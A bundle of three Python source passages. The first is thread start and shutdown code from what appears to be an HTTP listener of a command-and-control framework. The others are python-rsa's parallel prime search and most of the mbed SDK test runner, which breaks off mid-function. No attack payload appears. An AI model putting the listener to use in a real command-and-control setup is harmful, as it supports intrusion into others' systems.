print helpers.color("[!] Listener startup on port %s failed: %s " % (port, e))
dispatcher.send("[!] Listener startup on port %s failed: %s " % (port, e), sender='listeners/http')
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print helpers.color("[!] Killing listener '%s'" % (name))
self.threads[name].kill()
else:
print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value']))
self.threads[self.options['Name']['Value']].kill()
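# Usage sketch (illustrative only; assumes a configured listener instance called
# `listener` with its 'Name' option set):
#
#     started = listener.start()   # spawns start_server() in a KThread
#     ...
#     listener.shutdown()          # kills the thread keyed by the listener name
#
# start() sleeps for one second before checking is_alive(), so a False return usually
# means the Flask app failed to bind (bad port, missing certificate, etc.).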
|
parallel.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2011 Sybren A. Stüvel <sybren@stuvel.eu>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functions for parallel computation on multiple cores.
Introduced in Python-RSA 3.1.
.. note::
Requires Python 2.6 or newer.
"""
from __future__ import print_function
import multiprocessing as mp
from third_party.rsa._compat import range
import third_party.rsa.prime
import third_party.rsa.randnum
def _find_prime(nbits, pipe):
while True:
integer = third_party.rsa.randnum.read_random_odd_int(nbits)
# Test for primeness
if third_party.rsa.prime.is_prime(integer):
pipe.send(integer)
return
def getprime(nbits, poolsize):
"""Returns a prime number that can be stored in 'nbits' bits.
Works in multiple processes at the same time.
>>> p = getprime(128, 3)
>>> third_party.rsa.prime.is_prime(p-1)
False
>>> third_party.rsa.prime.is_prime(p)
True
>>> third_party.rsa.prime.is_prime(p+1)
False
>>> from third_party.rsa import common
>>> common.bit_size(p) == 128
True
"""
(pipe_recv, pipe_send) = mp.Pipe(duplex=False)
# Create processes
try:
procs = [mp.Process(target=_find_prime, args=(nbits, pipe_send))
for _ in range(poolsize)]
# Start processes
for p in procs:
p.start()
result = pipe_recv.recv()
finally:
pipe_recv.close()
pipe_send.close()
# Terminate processes
for p in procs:
p.terminate()
return result
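# Note (illustrative, not part of the original library): getprime() fans out `poolsize`
# worker processes that race to find a prime; the first one to succeed writes it to the
# pipe and the parent terminates the rest. A minimal sketch of the same pattern:
#
#     recv_end, send_end = mp.Pipe(duplex=False)
#     workers = [mp.Process(target=_find_prime, args=(512, send_end)) for _ in range(4)]
#     for w in workers: w.start()
#     prime = recv_end.recv()
#     for w in workers: w.terminate()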
__all__ = ['getprime']
if __name__ == '__main__':
print('Running doctests 100x or until failure')
import doctest
for count in range(100):
(failures, tests) = doctest.testmod()
if failures:
break
if count % 10 == 0 and count:
print('%i times' % count)
print('Doctests done')
|
test_api.py
|
"""
mbed SDK
Copyright (c) 2011-2014 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Author: Przemyslaw Wirkus <Przemyslaw.wirkus@arm.com>
"""
from __future__ import print_function
import os
import re
import sys
import json
import uuid
import pprint
import random
import argparse
import datetime
import threading
import ctypes
import functools
from colorama import Fore, Back, Style
from prettytable import PrettyTable
from copy import copy
from time import sleep, time
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty
from os.path import join, exists, basename, relpath
from threading import Thread, Lock
from multiprocessing import Pool, cpu_count
from subprocess import Popen, PIPE
# Imports related to mbed build api
from tools.tests import TESTS
from tools.tests import TEST_MAP
from tools.paths import BUILD_DIR
from tools.paths import HOST_TESTS
from tools.utils import ToolException
from tools.utils import NotSupportedException
from tools.utils import construct_enum
from tools.memap import MemapParser
from tools.targets import TARGET_MAP, Target
import tools.test_configs as TestConfig
from tools.test_db import BaseDBAccess
from tools.build_api import build_project, build_mbed_libs, build_lib
from tools.build_api import get_target_supported_toolchains
from tools.build_api import write_build_report
from tools.build_api import prep_report
from tools.build_api import prep_properties
from tools.build_api import create_result
from tools.build_api import add_result_to_report
from tools.build_api import prepare_toolchain
from tools.build_api import scan_resources
from tools.build_api import get_config
from tools.libraries import LIBRARIES, LIBRARY_MAP
from tools.options import extract_profile
from tools.toolchains import TOOLCHAIN_PATHS
from tools.toolchains import TOOLCHAINS
from tools.test_exporters import ReportExporter, ResultExporterType
from tools.utils import argparse_filestring_type
from tools.utils import argparse_uppercase_type
from tools.utils import argparse_lowercase_type
from tools.utils import argparse_many
import tools.host_tests.host_tests_plugins as host_tests_plugins
try:
import mbed_lstools
from tools.compliance.ioper_runner import get_available_oper_test_scopes
except:
pass
class ProcessObserver(Thread):
def __init__(self, proc):
Thread.__init__(self)
self.proc = proc
self.queue = Queue()
self.daemon = True
self.active = True
self.start()
def run(self):
while self.active:
c = self.proc.stdout.read(1)
self.queue.put(c)
def stop(self):
self.active = False
try:
self.proc.terminate()
except Exception:
pass
class SingleTestExecutor(threading.Thread):
""" Example: Single test class in separate thread usage
"""
def __init__(self, single_test):
self.single_test = single_test
threading.Thread.__init__(self)
def run(self):
start = time()
# Execute tests depending on options and filter applied
test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext = self.single_test.execute()
elapsed_time = time() - start
# Human readable summary
if not self.single_test.opts_suppress_summary:
# prints well-formed summary with results (SQL table like)
print(self.single_test.generate_test_summary(test_summary,
shuffle_seed))
if self.single_test.opts_test_x_toolchain_summary:
# prints well-formed summary with results (SQL table like)
# table shows text x toolchain test result matrix
print(self.single_test.generate_test_summary_by_target(
test_summary, shuffle_seed))
print("Completed in %.2f sec"% (elapsed_time))
class SingleTestRunner(object):
""" Object wrapper for single test run which may involve multiple MUTs
"""
RE_DETECT_TESTCASE_RESULT = None
# Return codes for test script
TEST_RESULT_OK = "OK"
TEST_RESULT_FAIL = "FAIL"
TEST_RESULT_ERROR = "ERROR"
TEST_RESULT_UNDEF = "UNDEF"
TEST_RESULT_IOERR_COPY = "IOERR_COPY"
TEST_RESULT_IOERR_DISK = "IOERR_DISK"
TEST_RESULT_IOERR_SERIAL = "IOERR_SERIAL"
TEST_RESULT_TIMEOUT = "TIMEOUT"
TEST_RESULT_NO_IMAGE = "NO_IMAGE"
TEST_RESULT_MBED_ASSERT = "MBED_ASSERT"
TEST_RESULT_BUILD_FAILED = "BUILD_FAILED"
TEST_RESULT_NOT_SUPPORTED = "NOT_SUPPORTED"
GLOBAL_LOOPS_COUNT = 1 # How many times each test should be repeated
TEST_LOOPS_LIST = [] # We redefine no.of loops per test_id
TEST_LOOPS_DICT = {} # TEST_LOOPS_LIST in dict format: { test_id : test_loop_count}
muts = {} # MUTs descriptor (from external file)
test_spec = {} # Test specification (from external file)
# mbed test suite -> SingleTestRunner
TEST_RESULT_MAPPING = {"success" : TEST_RESULT_OK,
"failure" : TEST_RESULT_FAIL,
"error" : TEST_RESULT_ERROR,
"ioerr_copy" : TEST_RESULT_IOERR_COPY,
"ioerr_disk" : TEST_RESULT_IOERR_DISK,
"ioerr_serial" : TEST_RESULT_IOERR_SERIAL,
"timeout" : TEST_RESULT_TIMEOUT,
"no_image" : TEST_RESULT_NO_IMAGE,
"end" : TEST_RESULT_UNDEF,
"mbed_assert" : TEST_RESULT_MBED_ASSERT,
"build_failed" : TEST_RESULT_BUILD_FAILED,
"not_supproted" : TEST_RESULT_NOT_SUPPORTED
}
def __init__(self,
_global_loops_count=1,
_test_loops_list=None,
_muts={},
_clean=False,
_parser=None,
_opts=None,
_opts_db_url=None,
_opts_log_file_name=None,
_opts_report_html_file_name=None,
_opts_report_junit_file_name=None,
_opts_report_build_file_name=None,
_opts_report_text_file_name=None,
_opts_build_report={},
_opts_build_properties={},
_test_spec={},
_opts_goanna_for_mbed_sdk=None,
_opts_goanna_for_tests=None,
_opts_shuffle_test_order=False,
_opts_shuffle_test_seed=None,
_opts_test_by_names=None,
_opts_peripheral_by_names=None,
_opts_test_only_peripheral=False,
_opts_test_only_common=False,
_opts_verbose_skipped_tests=False,
_opts_verbose_test_result_only=False,
_opts_verbose=False,
_opts_firmware_global_name=None,
_opts_only_build_tests=False,
_opts_parallel_test_exec=False,
_opts_suppress_summary=False,
_opts_test_x_toolchain_summary=False,
_opts_copy_method=None,
_opts_mut_reset_type=None,
_opts_jobs=None,
_opts_waterfall_test=None,
_opts_consolidate_waterfall_test=None,
_opts_extend_test_timeout=None,
_opts_auto_detect=None,
_opts_include_non_automated=False):
""" Let's try hard to init this object
"""
from colorama import init
init()
PATTERN = "\\{(" + "|".join(self.TEST_RESULT_MAPPING.keys()) + ")\\}"
self.RE_DETECT_TESTCASE_RESULT = re.compile(PATTERN)
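# Illustrative note (added; not in the original source): PATTERN matches the
# curly-brace status tokens that host tests print, e.g.
#
#     >>> re.compile("\\{(success|failure)\\}").search("result: {success}").group(1)
#     'success'
#
# and the captured token is translated through TEST_RESULT_MAPPING in get_test_result().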
# Settings related to test loops counters
try:
_global_loops_count = int(_global_loops_count)
except:
_global_loops_count = 1
if _global_loops_count < 1:
_global_loops_count = 1
self.GLOBAL_LOOPS_COUNT = _global_loops_count
self.TEST_LOOPS_LIST = _test_loops_list if _test_loops_list else []
self.TEST_LOOPS_DICT = self.test_loop_list_to_dict(_test_loops_list)
self.shuffle_random_seed = 0.0
self.SHUFFLE_SEED_ROUND = 10
# MUT list and test specification storage
self.muts = _muts
self.test_spec = _test_spec
# Settings passed e.g. from command line
self.opts_db_url = _opts_db_url
self.opts_log_file_name = _opts_log_file_name
self.opts_report_html_file_name = _opts_report_html_file_name
self.opts_report_junit_file_name = _opts_report_junit_file_name
self.opts_report_build_file_name = _opts_report_build_file_name
self.opts_report_text_file_name = _opts_report_text_file_name
self.opts_goanna_for_mbed_sdk = _opts_goanna_for_mbed_sdk
self.opts_goanna_for_tests = _opts_goanna_for_tests
self.opts_shuffle_test_order = _opts_shuffle_test_order
self.opts_shuffle_test_seed = _opts_shuffle_test_seed
self.opts_test_by_names = _opts_test_by_names
self.opts_peripheral_by_names = _opts_peripheral_by_names
self.opts_test_only_peripheral = _opts_test_only_peripheral
self.opts_test_only_common = _opts_test_only_common
self.opts_verbose_skipped_tests = _opts_verbose_skipped_tests
self.opts_verbose_test_result_only = _opts_verbose_test_result_only
self.opts_verbose = _opts_verbose
self.opts_firmware_global_name = _opts_firmware_global_name
self.opts_only_build_tests = _opts_only_build_tests
self.opts_parallel_test_exec = _opts_parallel_test_exec
self.opts_suppress_summary = _opts_suppress_summary
self.opts_test_x_toolchain_summary = _opts_test_x_toolchain_summary
self.opts_copy_method = _opts_copy_method
self.opts_mut_reset_type = _opts_mut_reset_type
self.opts_jobs = _opts_jobs if _opts_jobs is not None else 1
self.opts_waterfall_test = _opts_waterfall_test
self.opts_consolidate_waterfall_test = _opts_consolidate_waterfall_test
self.opts_extend_test_timeout = _opts_extend_test_timeout
self.opts_clean = _clean
self.opts_parser = _parser
self.opts = _opts
self.opts_auto_detect = _opts_auto_detect
self.opts_include_non_automated = _opts_include_non_automated
self.build_report = _opts_build_report
self.build_properties = _opts_build_properties
# File / screen logger initialization
self.logger = CLITestLogger(file_name=self.opts_log_file_name) # Default test logger
# Database related initializations
self.db_logger = factory_db_logger(self.opts_db_url)
self.db_logger_build_id = None # Build ID (database index of build_id table)
# Let's connect to database to set up credentials and confirm database is ready
if self.db_logger:
self.db_logger.connect_url(self.opts_db_url) # Save db access info inside db_logger object
if self.db_logger.is_connected():
# Get hostname and uname so we can use it as build description
# when creating new build_id in external database
(_hostname, _uname) = self.db_logger.get_hostname()
_host_location = os.path.dirname(os.path.abspath(__file__))
build_id_type = None if self.opts_only_build_tests is None else self.db_logger.BUILD_ID_TYPE_BUILD_ONLY
self.db_logger_build_id = self.db_logger.get_next_build_id(_hostname, desc=_uname, location=_host_location, type=build_id_type)
self.db_logger.disconnect()
def dump_options(self):
""" Function returns data structure with common settings passed to SingelTestRunner
It can be used for example to fill _extra fields in database storing test suite single run data
Example:
data = self.dump_options()
or
data_str = json.dumps(self.dump_options())
"""
result = {"db_url" : str(self.opts_db_url),
"log_file_name" : str(self.opts_log_file_name),
"shuffle_test_order" : str(self.opts_shuffle_test_order),
"shuffle_test_seed" : str(self.opts_shuffle_test_seed),
"test_by_names" : str(self.opts_test_by_names),
"peripheral_by_names" : str(self.opts_peripheral_by_names),
"test_only_peripheral" : str(self.opts_test_only_peripheral),
"test_only_common" : str(self.opts_test_only_common),
"verbose" : str(self.opts_verbose),
"firmware_global_name" : str(self.opts_firmware_global_name),
"only_build_tests" : str(self.opts_only_build_tests),
"copy_method" : str(self.opts_copy_method),
"mut_reset_type" : str(self.opts_mut_reset_type),
"jobs" : str(self.opts_jobs),
"extend_test_timeout" : str(self.opts_extend_test_timeout),
"_dummy" : ''
}
return result
def shuffle_random_func(self):
return self.shuffle_random_seed
def is_shuffle_seed_float(self):
""" return true if function parameter can be converted to float
"""
result = True
try:
float(self.shuffle_random_seed)
except ValueError:
result = False
return result
# This will store target / toolchain specific properties
test_suite_properties_ext = {} # target : toolchain
# Here we store test results
test_summary = []
# Here we store test results in extended data structure
test_summary_ext = {}
execute_thread_slice_lock = Lock()
def execute_thread_slice(self, q, target, toolchains, clean, test_ids, build_report, build_properties):
for toolchain in toolchains:
tt_id = "%s::%s" % (toolchain, target)
T = TARGET_MAP[target]
# print target, toolchain
# Test suite properties returned to external tools like CI
test_suite_properties = {
'jobs': self.opts_jobs,
'clean': clean,
'target': target,
'vendor': T.extra_labels[0],
'test_ids': ', '.join(test_ids),
'toolchain': toolchain,
'shuffle_random_seed': self.shuffle_random_seed
}
# print '=== %s::%s ===' % (target, toolchain)
# Let's build our test
if target not in TARGET_MAP:
print(self.logger.log_line(
self.logger.LogType.NOTIF,
'Skipped tests for %s target. Target platform not found' %
(target)))
continue
clean_mbed_libs_options = (self.opts_goanna_for_mbed_sdk or
self.opts_clean or clean)
profile = extract_profile(self.opts_parser, self.opts, toolchain)
stats_depth = self.opts.stats_depth or 2
try:
build_mbed_libs_result = build_mbed_libs(
T, toolchain,
clean=clean_mbed_libs_options,
verbose=self.opts_verbose,
jobs=self.opts_jobs,
report=build_report,
properties=build_properties,
build_profile=profile)
if not build_mbed_libs_result:
print(self.logger.log_line(
self.logger.LogType.NOTIF,
'Skipped tests for %s target. Toolchain %s is not '
'supported for this target'% (T.name, toolchain)))
continue
except ToolException:
print(self.logger.log_line(
self.logger.LogType.ERROR,
'There were errors while building MBED libs for %s using %s'
% (target, toolchain)))
continue
build_dir = join(BUILD_DIR, "test", target, toolchain)
test_suite_properties['build_mbed_libs_result'] = build_mbed_libs_result
test_suite_properties['build_dir'] = build_dir
test_suite_properties['skipped'] = []
# Enumerate through all tests and shuffle test order if requested
test_map_keys = sorted(TEST_MAP.keys())
if self.opts_shuffle_test_order:
random.shuffle(test_map_keys, self.shuffle_random_func)
# Update database with shuffle seed if applicable
if self.db_logger:
self.db_logger.reconnect()
if self.db_logger.is_connected():
self.db_logger.update_build_id_info(
self.db_logger_build_id,
_shuffle_seed=self.shuffle_random_func())
self.db_logger.disconnect()
if self.db_logger:
self.db_logger.reconnect()
if self.db_logger.is_connected():
# Update MUTs and Test Specification in database
self.db_logger.update_build_id_info(
self.db_logger_build_id,
_muts=self.muts, _test_spec=self.test_spec)
# Update Extra information in database (some options passed to test suite)
self.db_logger.update_build_id_info(
self.db_logger_build_id,
_extra=json.dumps(self.dump_options()))
self.db_logger.disconnect()
valid_test_map_keys = self.get_valid_tests(test_map_keys, target, toolchain, test_ids, self.opts_include_non_automated)
skipped_test_map_keys = self.get_skipped_tests(test_map_keys, valid_test_map_keys)
for skipped_test_id in skipped_test_map_keys:
test_suite_properties['skipped'].append(skipped_test_id)
# First pass through all tests and determine which libraries need to be built
libraries = []
for test_id in valid_test_map_keys:
test = TEST_MAP[test_id]
# Detect which lib should be added to test
# Some libs have to compiled like RTOS or ETH
for lib in LIBRARIES:
if lib['build_dir'] in test.dependencies and lib['id'] not in libraries:
libraries.append(lib['id'])
clean_project_options = True if self.opts_goanna_for_tests or clean or self.opts_clean else None
# Build all required libraries
for lib_id in libraries:
try:
build_lib(lib_id,
T,
toolchain,
verbose=self.opts_verbose,
clean=clean_mbed_libs_options,
jobs=self.opts_jobs,
report=build_report,
properties=build_properties,
build_profile=profile)
except ToolException:
print(self.logger.log_line(
self.logger.LogType.ERROR,
'There were errors while building library %s' % lib_id))
continue
for test_id in valid_test_map_keys:
test = TEST_MAP[test_id]
test_suite_properties['test.libs.%s.%s.%s'% (target, toolchain, test_id)] = ', '.join(libraries)
# TODO: move this 2 below loops to separate function
INC_DIRS = []
for lib_id in libraries:
if 'inc_dirs_ext' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['inc_dirs_ext']:
INC_DIRS.extend(LIBRARY_MAP[lib_id]['inc_dirs_ext'])
MACROS = []
for lib_id in libraries:
if 'macros' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['macros']:
MACROS.extend(LIBRARY_MAP[lib_id]['macros'])
MACROS.append('TEST_SUITE_TARGET_NAME="%s"'% target)
MACROS.append('TEST_SUITE_TEST_ID="%s"'% test_id)
test_uuid = uuid.uuid4()
MACROS.append('TEST_SUITE_UUID="%s"'% str(test_uuid))
# Prepare extended test results data structure (it can be used to generate detailed test report)
if target not in self.test_summary_ext:
self.test_summary_ext[target] = {} # test_summary_ext : toolchain
if toolchain not in self.test_summary_ext[target]:
self.test_summary_ext[target][toolchain] = {} # test_summary_ext : toolchain : target
tt_test_id = "%s::%s::%s" % (toolchain, target, test_id) # For logging only
project_name = self.opts_firmware_global_name if self.opts_firmware_global_name else None
try:
path = build_project(test.source_dir, join(build_dir, test_id), T,
toolchain, test.dependencies, clean=clean_project_options,
verbose=self.opts_verbose, name=project_name, macros=MACROS,
inc_dirs=INC_DIRS, jobs=self.opts_jobs, report=build_report,
properties=build_properties, project_id=test_id,
project_description=test.get_description(),
build_profile=profile, stats_depth=stats_depth)
except Exception as e:
project_name_str = project_name if project_name is not None else test_id
test_result = self.TEST_RESULT_FAIL
if isinstance(e, ToolException):
print(self.logger.log_line(
self.logger.LogType.ERROR,
'There were errors while building project %s' %
project_name_str))
test_result = self.TEST_RESULT_BUILD_FAILED
elif isinstance(e, NotSupportedException):
print(self.logger.log_line(
self.logger.LogType.INFO,
'Project %s is not supported' % project_name_str))
test_result = self.TEST_RESULT_NOT_SUPPORTED
# Append test results to global test summary
self.test_summary.append(
(test_result, target, toolchain, test_id,
test.get_description(), 0, 0, '-')
)
# Add detailed test result to test summary structure
if test_id not in self.test_summary_ext[target][toolchain]:
self.test_summary_ext[target][toolchain][test_id] = []
self.test_summary_ext[target][toolchain][test_id].append({ 0: {
'result' : test_result,
'output' : '',
'target_name' : target,
'target_name_unique': target,
'toolchain_name' : toolchain,
'id' : test_id,
'description' : test.get_description(),
'elapsed_time' : 0,
'duration' : 0,
'copy_method' : None
}})
continue
if self.opts_only_build_tests:
# With this option we are skipping testing phase
continue
# Test duration can be increased by global value
test_duration = test.duration
if self.opts_extend_test_timeout is not None:
test_duration += self.opts_extend_test_timeout
# For an automated test the duration acts as a timeout after
# which the test gets interrupted
test_spec = self.shape_test_request(target, path, test_id, test_duration)
test_loops = self.get_test_loop_count(test_id)
test_suite_properties['test.duration.%s.%s.%s'% (target, toolchain, test_id)] = test_duration
test_suite_properties['test.loops.%s.%s.%s'% (target, toolchain, test_id)] = test_loops
test_suite_properties['test.path.%s.%s.%s'% (target, toolchain, test_id)] = path
# read MUTs, test specification and perform tests
handle_results = self.handle(test_spec, target, toolchain, test_loops=test_loops)
if handle_results is None:
continue
for handle_result in handle_results:
if handle_result:
single_test_result, detailed_test_results = handle_result
else:
continue
# Append test results to global test summary
if single_test_result is not None:
self.test_summary.append(single_test_result)
# Add detailed test result to test summary structure
if test_id not in self.test_summary_ext[target][toolchain]:
self.test_summary_ext[target][toolchain][test_id] = []
append_test_result = detailed_test_results
# If waterfall and consolidate-waterfall options are enabled,
# only include the last test result in the report.
if self.opts_waterfall_test and self.opts_consolidate_waterfall_test:
append_test_result = {0: detailed_test_results[len(detailed_test_results) - 1]}
self.test_summary_ext[target][toolchain][test_id].append(append_test_result)
test_suite_properties['skipped'] = ', '.join(test_suite_properties['skipped'])
self.test_suite_properties_ext[target][toolchain] = test_suite_properties
q.put(target + '_'.join(toolchains))
return
def execute(self):
clean = self.test_spec.get('clean', False)
test_ids = self.test_spec.get('test_ids', [])
q = Queue()
# Generate seed for shuffle if a seed is not provided in the options
self.shuffle_random_seed = round(random.random(), self.SHUFFLE_SEED_ROUND)
if self.opts_shuffle_test_seed is not None and self.is_shuffle_seed_float():
self.shuffle_random_seed = round(float(self.opts_shuffle_test_seed), self.SHUFFLE_SEED_ROUND)
if self.opts_parallel_test_exec:
###################################################################
# Experimental, parallel test execution per singletest instance.
###################################################################
execute_threads = [] # Threads used to build mbed SDK, libs, test cases and execute tests
# Note: We are building here in parallel for each target separately!
# So we are not building the same thing multiple times and compilers
# in separate threads do not collide.
# Inside the execute_thread_slice() function, handle() will be called to
# get information about available MUTs (per target).
for target, toolchains in self.test_spec['targets'].items():
self.test_suite_properties_ext[target] = {}
t = threading.Thread(target=self.execute_thread_slice, args = (q, target, toolchains, clean, test_ids, self.build_report, self.build_properties))
t.daemon = True
t.start()
execute_threads.append(t)
for t in execute_threads:
q.get() # use the queue instead of t.join() so we do not wait for threads to finish in a fixed order
else:
# Serialized (not parallel) test execution
for target, toolchains in self.test_spec['targets'].items():
if target not in self.test_suite_properties_ext:
self.test_suite_properties_ext[target] = {}
self.execute_thread_slice(q, target, toolchains, clean, test_ids, self.build_report, self.build_properties)
q.get()
if self.db_logger:
self.db_logger.reconnect()
if self.db_logger.is_connected():
self.db_logger.update_build_id_info(self.db_logger_build_id, _status_fk=self.db_logger.BUILD_ID_STATUS_COMPLETED)
self.db_logger.disconnect()
return self.test_summary, self.shuffle_random_seed, self.test_summary_ext, self.test_suite_properties_ext, self.build_report, self.build_properties
def get_valid_tests(self, test_map_keys, target, toolchain, test_ids, include_non_automated):
valid_test_map_keys = []
for test_id in test_map_keys:
test = TEST_MAP[test_id]
if self.opts_test_by_names and test_id not in self.opts_test_by_names:
continue
if test_ids and test_id not in test_ids:
continue
if self.opts_test_only_peripheral and not test.peripherals:
if self.opts_verbose_skipped_tests:
print(self.logger.log_line(
self.logger.LogType.INFO,
'Common test skipped for target %s' % target))
continue
if (self.opts_peripheral_by_names and test.peripherals and
not any((i in self.opts_peripheral_by_names)
for i in test.peripherals)):
# We will skip tests not forced with -p option
if self.opts_verbose_skipped_tests:
print(self.logger.log_line(
self.logger.LogType.INFO,
'Common test skipped for target %s' % target))
continue
if self.opts_test_only_common and test.peripherals:
if self.opts_verbose_skipped_tests:
print(self.logger.log_line(
self.logger.LogType.INFO,
'Peripheral test skipped for target %s' % target))
continue
if not include_non_automated and not test.automated:
if self.opts_verbose_skipped_tests:
print(self.logger.log_line(
self.logger.LogType.INFO,
'Non automated test skipped for target %s' % target))
continue
if test.is_supported(target, toolchain):
if test.peripherals is None and self.opts_only_build_tests:
# When the user passes the 'build only' flag and the test does not
# specify peripherals, we allow the test to build by default
pass
elif self.opts_peripheral_by_names and test_id not in self.opts_peripheral_by_names:
# If we force peripheral with option -p we expect test
# to pass even if peripheral is not in MUTs file.
pass
elif not self.is_peripherals_available(target, test.peripherals):
if self.opts_verbose_skipped_tests:
if test.peripherals:
print(self.logger.log_line(
self.logger.LogType.INFO,
'Peripheral %s test skipped for target %s' %
(",".join(test.peripherals), target)))
else:
print(self.logger.log_line(
self.logger.LogType.INFO,
'Test %s skipped for target %s' %
(test_id, target)))
continue
# The test has made it through all the filters, so add it to the valid tests list
valid_test_map_keys.append(test_id)
return valid_test_map_keys
def get_skipped_tests(self, all_test_map_keys, valid_test_map_keys):
# NOTE: This will not preserve order
return list(set(all_test_map_keys) - set(valid_test_map_keys))
def generate_test_summary_by_target(self, test_summary, shuffle_seed=None):
""" Prints well-formed summary with results (SQL table like)
table shows test x toolchain test result matrix
"""
RESULT_INDEX = 0
TARGET_INDEX = 1
TOOLCHAIN_INDEX = 2
TEST_INDEX = 3
DESC_INDEX = 4
unique_targets = get_unique_value_from_summary(test_summary, TARGET_INDEX)
unique_tests = get_unique_value_from_summary(test_summary, TEST_INDEX)
unique_test_desc = get_unique_value_from_summary_ext(test_summary, TEST_INDEX, DESC_INDEX)
unique_toolchains = get_unique_value_from_summary(test_summary, TOOLCHAIN_INDEX)
result = "Test summary:\n"
for target in unique_targets:
result_dict = {} # test : { toolchain : result }
unique_target_toolchains = []
for test in test_summary:
if test[TARGET_INDEX] == target:
if test[TOOLCHAIN_INDEX] not in unique_target_toolchains:
unique_target_toolchains.append(test[TOOLCHAIN_INDEX])
if test[TEST_INDEX] not in result_dict:
result_dict[test[TEST_INDEX]] = {}
result_dict[test[TEST_INDEX]][test[TOOLCHAIN_INDEX]] = test[RESULT_INDEX]
pt_cols = ["Target", "Test ID", "Test Description"] + unique_target_toolchains
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
pt.padding_width = 1 # One space between column edges and contents (default)
for test in unique_tests:
if test in result_dict:
test_results = result_dict[test]
if test in unique_test_desc:
row = [target, test, unique_test_desc[test]]
for toolchain in unique_toolchains:
if toolchain in test_results:
row.append(test_results[toolchain])
pt.add_row(row)
result += pt.get_string()
shuffle_seed_text = "Shuffle Seed: %.*f"% (self.SHUFFLE_SEED_ROUND,
shuffle_seed if shuffle_seed else self.shuffle_random_seed)
result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
return result
def generate_test_summary(self, test_summary, shuffle_seed=None):
""" Prints well-formed summary with results (SQL table like)
table shows target x test results matrix
"""
success_code = 0 # Success code that can be later returned to the caller
result = "Test summary:\n"
# Pretty table package is used to print results
pt = PrettyTable(["Result", "Target", "Toolchain", "Test ID", "Test Description",
"Elapsed Time (sec)", "Timeout (sec)", "Loops"])
pt.align["Result"] = "l" # Left align
pt.align["Target"] = "l" # Left align
pt.align["Toolchain"] = "l" # Left align
pt.align["Test ID"] = "l" # Left align
pt.align["Test Description"] = "l" # Left align
pt.padding_width = 1 # One space between column edges and contents (default)
result_dict = {self.TEST_RESULT_OK : 0,
self.TEST_RESULT_FAIL : 0,
self.TEST_RESULT_ERROR : 0,
self.TEST_RESULT_UNDEF : 0,
self.TEST_RESULT_IOERR_COPY : 0,
self.TEST_RESULT_IOERR_DISK : 0,
self.TEST_RESULT_IOERR_SERIAL : 0,
self.TEST_RESULT_NO_IMAGE : 0,
self.TEST_RESULT_TIMEOUT : 0,
self.TEST_RESULT_MBED_ASSERT : 0,
self.TEST_RESULT_BUILD_FAILED : 0,
self.TEST_RESULT_NOT_SUPPORTED : 0
}
for test in test_summary:
if test[0] in result_dict:
result_dict[test[0]] += 1
pt.add_row(test)
result += pt.get_string()
result += "\n"
# Print result count
result += "Result: " + ' / '.join(['%s %s' % (value, key) for (key, value) in {k: v for k, v in result_dict.items() if v != 0}.items()])
shuffle_seed_text = "Shuffle Seed: %.*f\n"% (self.SHUFFLE_SEED_ROUND,
shuffle_seed if shuffle_seed else self.shuffle_random_seed)
result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
return result
def test_loop_list_to_dict(self, test_loops_str):
""" Transforms test_id=X,test_id=X,test_id=X into dictionary {test_id : test_id_loops_count}
"""
result = {}
if test_loops_str:
test_loops = test_loops_str
for test_loop in test_loops:
test_loop_count = test_loop.split('=')
if len(test_loop_count) == 2:
_test_id, _test_loops = test_loop_count
try:
_test_loops = int(_test_loops)
except:
continue
result[_test_id] = _test_loops
return result
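# Example (illustrative, not original code): a command-line value such as
# ['MBED_1=3', 'MBED_2=10'] becomes {'MBED_1': 3, 'MBED_2': 10}; entries whose loop
# count is not an integer are silently skipped by the try/except above.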
def get_test_loop_count(self, test_id):
""" This function returns no. of loops per test (deducted by test_id_.
If test is not in list of redefined loop counts it will use default value.
"""
result = self.GLOBAL_LOOPS_COUNT
if test_id in self.TEST_LOOPS_DICT:
result = self.TEST_LOOPS_DICT[test_id]
return result
def delete_file(self, file_path):
""" Remove file from the system
"""
result = True
resutl_msg = ""
try:
os.remove(file_path)
except Exception as e:
resutl_msg = e
result = False
return result, resutl_msg
def handle_mut(self, mut, data, target_name, toolchain_name, test_loops=1):
""" Test is being invoked for given MUT.
"""
# Get test information, image and test timeout
test_id = data['test_id']
test = TEST_MAP[test_id]
test_description = TEST_MAP[test_id].get_description()
image = data["image"]
duration = data.get("duration", 10)
if mut is None:
print("Error: No Mbed available: MUT[%s]" % data['mcu'])
return None
mcu = mut['mcu']
copy_method = mut.get('copy_method') # Available board configuration selection e.g. core selection etc.
if self.db_logger:
self.db_logger.reconnect()
selected_copy_method = self.opts_copy_method if copy_method is None else copy_method
